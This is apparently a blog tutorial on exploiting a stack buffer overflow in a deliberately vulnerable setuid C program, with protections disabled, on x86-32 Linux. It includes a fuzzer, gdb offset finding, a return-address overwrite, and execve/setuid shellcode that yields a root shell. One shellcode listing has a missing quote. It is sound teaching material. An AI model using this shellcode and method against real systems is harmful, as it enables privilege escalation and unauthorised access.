Plain Buffer Overflow

Posted on Thu 08 May 2014 in x86-32 Linux

This is the start of a series of tutorials exploring how to detect and exploit stack based vulnerabilities on x86-32 Linux systems. As this is the first it will involve detecting and exploiting a buffer overflow on a system with no protections in place. Modern protections will be explored in future tutorials but its important to understand the basics before trying to take on the more complex situations.

A buffer overflow happens when a programmer has not done sufficient bounds checking while or before copying the contents of one buffer into another. A buffer is normally a variable array (stack) or memory allocated using a dynamic memory allocation function (heap). We will be concentrating on stack based (variable array) buffer overflows at first as they are much easier to understand for beginners.

All of the code in this tutorial was written by the author.

The Vulnerable App

Below is the source code of the vulnerable application that we will be attacking. It is written in C.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PASS "topsecretpassword"

#define SFILE "secret.txt"

int checkpass(char *p);
void printfile();

int main(int argc, char **argv)
{
    int r;

    if (argc < 2) {
        printf("Usage: ");
        printf(argv[0]);
        printf(" <password>\n");
        exit(1);
    }
    r = checkpass(argv[1]);
    if (r != 0) {
        printf("Wrong password: ");
        printf(argv[1]);
        printf("\n");
        exit(1);
    }
    printfile();
}

int checkpass(char *a)
{
    char p[512];
    int r;
    strncpy(p, a, strlen(a)+1);
    r = strcmp(p, PASS);
    return r;
}

void printfile()
{
    FILE *f;
    int c;
    f = fopen(SFILE, "r");
    if (f) {
        while ((c = getc(f)) != EOF)
            putchar(c);
        fclose(f);
    } else {
        printf("Error opening file: " SFILE "\n");
        exit(1);
    }
}

The Fix

The code in the above application that is vulnerable to a stack based buffer overflow is on line 36 (strncpy(p, a, strlen(a)+1);). Here the programmer has wrongly calculated the maximum number of bytes that can be copied into the buffer p as strlen(a)+1, this calculation is in fact based on the length of the input provided by the user and is controled by the user. To fix this vulnerability, this line should be changed to strncpy(p, a, sizeof(p)-1); or strncpy(p, a, 511);, we minus the 1 byte to leave space for the terminating null character '\0'. For more information about strncpy see man strncpy.

Setting Up The Environment

This is how to setup the environment in full on a Debian based system:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
root@dev:~# adduser testuser
Adding user `testuser' ...
Adding new group `testuser' (1001) ...
Adding new user `testuser' (1001) with group `testuser' ...
Creating home directory `/home/testuser' ...
Copying files from `/etc/skel' ...
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
Changing the user information for testuser
Enter the new value, or press ENTER for the default
    Full Name []: 
    Room Number []: 
    Work Phone []: 
    Home Phone []: 
    Other []: 
Is the information correct? [Y/n]
root@dev:~# ls
app.c
root@dev:~# gcc -z execstack -fno-stack-protector -o app app.c
root@dev:~# cp app /home/testuser/
root@dev:~# cat /proc/sys/kernel/randomize_va_space 
2
root@dev:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@dev:~# cat /proc/sys/kernel/randomize_va_space
0
root@dev:~# cd /home/testuser/
root@dev:/home/testuser# ls -l app
-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app
root@dev:/home/testuser# chmod u+s app
root@dev:/home/testuser# ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
root@dev:/home/testuser# echo 'This is a top secret file!
> Only people with the password should be able to view this file!' > secret.txt
root@dev:/home/testuser# ls -l secret.txt
-rw-r--r-- 1 root root 91 May  9 13:40 secret.txt
root@dev:/home/testuser# chmod 600 secret.txt
root@dev:/home/testuser# ls -l secret.txt
-rw------- 1 root root 91 May  9 13:40 secret.txt
root@dev:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!
root@dev:/home/testuser# su - testuser
testuser@dev:~$ ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
testuser@dev:~$ ls -l secret.txt 
-rw------- 1 root root 91 May  9 13:40 secret.txt
testuser@dev:~$ cat secret.txt
cat: secret.txt: Permission denied

So our environment is setup and ready for exploit development. Firstly a testuser is added to run the application as, then on line 20 the application is compiled with stack protections removed. On line 24 ASLR is disabled and on line 30 the application has the setuid bit set so that when run the application can run with root privileges (which is required to read the file created on lines 33 and 34). Lastly confirmation that the file is not readable by the user that runs the application is on lines 48 and 49.

Testing The App / Finding The Vulnerability

First we need to use the application to figure out its inputs and see how the application acts normally:

1
2
3
4
5
6
testuser@dev:~$ ./app
Usage: ./app <password>
testuser@dev:~$ ./app test
Wrong password: test
testuser@dev:~$ echo $?
1

As we can see, when we enter the wrong password the applications exit code is 1, let's try fuzzing this input to look for a buffer overflow, here is a simple python script that can do that:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/usr/bin/env python

import os
from subprocess import Popen, PIPE

count=0 # store the number when we cause a crash

for i in range(5000): # loop through the numbers from 0 to 5000
                      # and use i as the incrementor

        # execute the file ./app with the argument "A"*i so we keep
        # increasing the number of A's by 1
        process = Popen(["./app", "A"*i], stdin=PIPE, stdout=PIPE)
        (output, err) = process.communicate()

        exit_code = process.wait() # wait for the programs exit code
        if exit_code != 1: # if its not = 1
                count = i # set the count to i
                break # and break out of the loop


print count # print the number of A's it took to crash it

Running the python script gives us:

1
2
testuser@dev:~$ python app-fuzz.py
524

Exploiting The App

So the python script crashed the application by inserting 524 A's as its input. Just because we crashed the application it doesn't mean we took control of the applications execution, so we now need to figure out how many bytes we need to send before we hijack execution (one character is a single byte, so 524 A's is 524 bytes).

We will use gdb to do this. The hex for A is 41, you can figure this out using the ascii man page (man ascii), so what we are looking for is when the application crashes it should be trying to run 41414141 (as this is a 32 bit system, each instruction is 32 bits long or 4 bytes):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
testuser@dev:~$ gdb -q ./app
Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
(gdb) r $(python -c 'print "A" * 524')
Starting program: /home/testuser/app $(python -c 'print "A" * 524')

Program received signal SIGSEGV, Segmentation fault.
0xb7ed9d03 in strchrnul () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
(gdb) r $(python -c 'print "A" * 528')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 528')

Program received signal SIGSEGV, Segmentation fault.
0xbffff970 in ?? ()
(gdb) r $(python -c 'print "A" * 532')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 532')

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

We increase the number of bytes by 4 each time because we are on a 32 bit system. So 528 bytes and then we hijack execution, you can see this as when the application crashes the instruction that the application is trying to run is 0x41414141 (on line 21) which is just AAAA.

I'm going to show you 2 ways you can exploit this, the first is very easy and just involves changing the flow of the application to bypass the password authentication. First we need to find the address of the code that is run after the check, again we'll use gdb for this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
testuser@dev:~$ gdb -q ./app
Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x0804860c <+0>:     push   ebp
   0x0804860d <+1>:     mov    ebp,esp
   0x0804860f <+3>:     and    esp,0xfffffff0
   0x08048612 <+6>:     sub    esp,0x20
   0x08048615 <+9>:     cmp    DWORD PTR [ebp+0x8],0x1
   0x08048619 <+13>:    jg     0x804864c <main+64>
   0x0804861b <+15>:    mov    DWORD PTR [esp],0x80487f0
   0x08048622 <+22>:    call   0x8048470 <printf@plt>
   0x08048627 <+27>:    mov    eax,DWORD PTR [ebp+0xc]
   0x0804862a <+30>:    mov    eax,DWORD PTR [eax]
   0x0804862c <+32>:    mov    DWORD PTR [esp],eax
   0x0804862f <+35>:    call   0x8048470 <printf@plt>
   0x08048634 <+40>:    mov    DWORD PTR [esp],0x80487f8
   0x0804863b <+47>:    call   0x80484a0 <puts@plt>
   0x08048640 <+52>:    mov    DWORD PTR [esp],0x1
   0x08048647 <+59>:    call   0x80484c0 <exit@plt>
   0x0804864c <+64>:    mov    eax,DWORD PTR [ebp+0xc]
   0x0804864f <+67>:    add    eax,0x4
   0x08048652 <+70>:    mov    eax,DWORD PTR [eax]
   0x08048654 <+72>:    mov    DWORD PTR [esp],eax
   0x08048657 <+75>:    call   0x80486a2 <checkpass>
   0x0804865c <+80>:    mov    DWORD PTR [esp+0x1c],eax
   0x08048660 <+84>:    cmp    DWORD PTR [esp+0x1c],0x0
   0x08048665 <+89>:    je     0x804869b <main+143>
   0x08048667 <+91>:    mov    DWORD PTR [esp],0x8048804
   0x0804866e <+98>:    call   0x8048470 <printf@plt>
   0x08048673 <+103>:   mov    eax,DWORD PTR [ebp+0xc]
   0x08048676 <+106>:   add    eax,0x4
   0x08048679 <+109>:   mov    eax,DWORD PTR [eax]
   0x0804867b <+111>:   mov    DWORD PTR [esp],eax
   0x0804867e <+114>:   call   0x8048470 <printf@plt>
   0x08048683 <+119>:   mov    DWORD PTR [esp],0xa
   0x0804868a <+126>:   call   0x8048500 <putchar@plt>
   0x0804868f <+131>:   mov    DWORD PTR [esp],0x1
   0x08048696 <+138>:   call   0x80484c0 <exit@plt>
   0x0804869b <+143>:   call   0x80486f0 <printfile>
   0x080486a0 <+148>:   leave  
   0x080486a1 <+149>:   ret    
End of assembler dump.

I use the -q option to gdb to supress the informational message that it normally splits out on started, I then set the disassembly flavor to intel format because gdb defaults to AT&T format and I prefer intel.

The call to printfile on line 41 looks like a good choice to jump to and as we can see it is at address 0x0804869b. All we need to do is put this address in, in reverse due to little endian, after 528 bytes, heres how:

1
2
3
4
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x9b\x86\x04\x08"')
This is a top secret file!
Only people with the password should be able to view this file!
Segmentation fault

We still get a segmentation fault but it outputs the contents of the file meaning we've circumvented the password protection.

Developing Shellcode / Improving Exploitation

Now I'm going to show you how to use this to run your own code as root. First we need some code to run. I've written a quick assembly application in IA32 format which just runs the execve system call with /bin/bash as its argument (for more information on execve itself see man execve):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
; run /bin/bash

global _start

section .text

_start:
        jmp short Call_shellcode ; jump to where our string is

shellcode:
        pop ebx ; pop the address of our string into ebx
                ; which is the first argument to execve

        xor eax, eax ; zero out the eax register

        mov [ebx +9], al ; put a 0 where the A is to null
                         ; terminate the /bin/bash string

        mov al, 0xb ; put the sys call number 11 into eax

        mov [ebx +10], ebx ; put a pointer to the beginning
                           ; of the string where the BBBB is

        xor ecx, ecx ; zero out the ecx register

        mov [ebx +14], ecx ; replace the CCCC with 0000

        lea ecx, [ebx +10] ; load the address that used to
                           ; point to BBBB into ecx the second
                           ; argument to execve

        lea edx, [ebx +14] ; load the address that used to
                           ; point to CCCC into edx the third
                           ; argument to execve

        int 0x80 ; execute the syscall execve

Call_shellcode:
        call shellcode ; call the start of the actual application
        shell: db       "/bin/bashABBBBCCCC" ; our string of
                                             ; arguments to execve

A system call works by loading the sys call number into the eax register, putting the 1st, 2nd and 3rd arguments into the ebx, ecx, edx registers respectively; and then running int 0x80 to execute the system call. To find the sys call number do this:

1
2
testuser@dev:~$ grep execve /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_execve 11

This means execve is 11 or 0xb in hex.

In this shellcode I'm using the jmp-call-pop technique to get the address of the string and the list of arguments (When you do a call instruction, the address of the next instruction is pushed onto the stack), this makes the code position independent. So we now need to extract this shellcode:

1
2
3
4
testuser@dev:~$ nasm -f elf32 -o shell.o shell.nasm
testuser@dev:~$ ld -o shell shell.o
testuser@dev:~$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"

We have shellcode now but we should test it to make sure it works, the following C application can do that:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b"
"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e"
"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";

main()
{

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}

I've split it up onto multiple lines here for readability. Compiling it and running it:

1
2
3
4
testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c
testuser@dev:~$ ./shellcode
Shellcode Length:  49
testuser@dev:/home/testuser$

It worked, the application shellcode just sets the return value of the main function to the address of the beginning of our shellcode which run's it because you can't just run it manually:

1
2
testuser@dev:~$ ./shell
Segmentation fault

Now we need to figure out a way to put our shellcode in memory and find its address to hijack execution of our vulnerable application with. We can put it in an environment varable and use getenv to get its address, here is how we put it into an environment variable:

1
testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')

Here is another C application that we can use to get the address of an environment variable in the memory of another application:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
        char *ptr;

        if(argc < 3) {
                printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
                exit(0);
        }
        ptr = getenv(argv[1]); /* get env var location */
        ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
        printf("%s will be at %p\n", argv[1], ptr);
}

We compile this application and run it with the relevent arguments:

1
2
3
testuser@dev:~$ gcc -o getenvaddr getenvaddr.c
testuser@dev:~$ ./getenvaddr SHELLCODE ./app
SHELLCODE will be at 0xbffff774

Great! Nearly there, we've got the address of our shellcode now to use it. We will hijack the execution flow as we did before but this time we will point to the address of our environment variable:

1
2
3
4
5
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x74\xf7\xff\xbf"')
bash-4.2$ whoami
testuser
bash-4.2$ cat secret.txt
cat: secret.txt: Permission denied

Damn! So it didn't work. It must be dropping privileges, no need to worry, but we now to to change our shellcode to run the setuid system call before executing execve and set the uid to 0 (or root) (for more information on setuid see man setuid). First we need to find out the sys call number:

1
2
3
testuser@dev:~$ grep setuid /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_setuid 23
#define __NR_setuid32 213

The sys call number is 23 or 0x17 in hex, our modified shellcode is:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
; run /bin/bash

global _start

section .text

_start:
        jmp short Call_shellcode ; jump to where our string is

shellcode:
        xor eax, eax ; zero out eax

        mov al, 0x17 ; put 23 into eax to setuid

        xor ebx, ebx ; zero out ebx

        int 0x80 ; make the syscall setuid

        mov eax, ebx ; zero out eax

        pop ebx ; pop the address of our string into ebx
                ; which is the first argument to execve

        mov [ebx +9], al ; put a 0 where the A is to null
                         ; terminate the /bin/bash string

        mov al, 0xb ; put the sys call number 11 into eax

        mov [ebx +10], ebx ; put a pointer to the beginning
                           ; of the string where the BBBB is

        xor ecx, ecx ; zero out the ecx register

        mov [ebx +14], ecx ; replace the CCCC with 0000

        lea ecx, [ebx +10] ; load the address that used to
                           ; point to BBBB into ecx the second
                           ; argument to execve

        lea edx, [ebx +14] ; load the address that used to
                           ; point to CCCC into edx the third
                           ; argument to execve

        int 0x80 ; execute the syscall execve

Call_shellcode:
        call shellcode ; call the start of the actual application
        shell: db       "/bin/bashABBBBCCCC" ; our string of
                                             ; arguments to execve

This is the same as before except I added a call to setuid before it starts setting up the call to execve. Let's first make sure it works:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
testuser@dev:~$ nasm -f elf32 -o shell2.o shell2.nasm
testuser@dev:~$ ld -o shell2 shell2.o
testuser@dev:~$ objdump -d ./shell2|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
testuser@dev:~$ cat shellcode.c
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";

main()
{

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}
testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c
testuser@dev:~$ ./shellcode
Shellcode Length:  57
testuser@dev:/home/testuser$

That seems to work, let's test it out:

1
2
3
4
5
6
7
8
9
testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')
testuser@dev:~$ ./getenvaddr SHELLCODE ./app
SHELLCODE will be at 0xbffff76c
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x6c\xf7\xff\xbf"')
root@dev:/home/testuser# whoami
root
root@dev:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!

PWNED!!! :-D

Conclusion

It's very important to understand that when you are developing exploits you are always going to run into problems, that is why I left the bit in here where I didn't get root access. You will fail over and over again but if you continue trying you will find a way to hack it in the end.

This was one of the simplest examples possible but before continuing it is important that you are able to do this. Don't worry if you don't understand how the application execution was hijacked or how the stack works, I will explain all of that in later tutorials when it is absolutely necessary, this tutorial is already long enough without going into more depth.

I hope you enjoyed reading this as much as I enjoyed writing it.

Happy Hacking :-)